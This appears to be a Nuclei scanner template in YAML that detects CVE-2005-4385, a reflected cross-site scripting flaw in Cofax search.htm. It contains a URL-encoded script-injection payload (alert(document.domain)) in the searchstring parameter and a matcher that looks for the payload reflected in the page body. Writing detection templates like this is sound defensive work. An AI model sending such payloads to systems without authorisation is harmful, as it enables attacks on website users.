37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
id: CVE-2005-4385
|
|
|
|
info:
|
|
name: Cofax <=2.0RC3 - Cross-Site Scripting
|
|
author: geeknik
|
|
severity: medium
|
|
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
|
reference:
|
|
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
|
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2005-4385
|
|
cwe-id: NVD-CWE-Other
|
|
tags: cofax,xss,cve,cve2005
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "'>\"</script><script>alert(document.domain)</script>"
|
|
|
|
# Enhanced by mp on 2022/08/12
|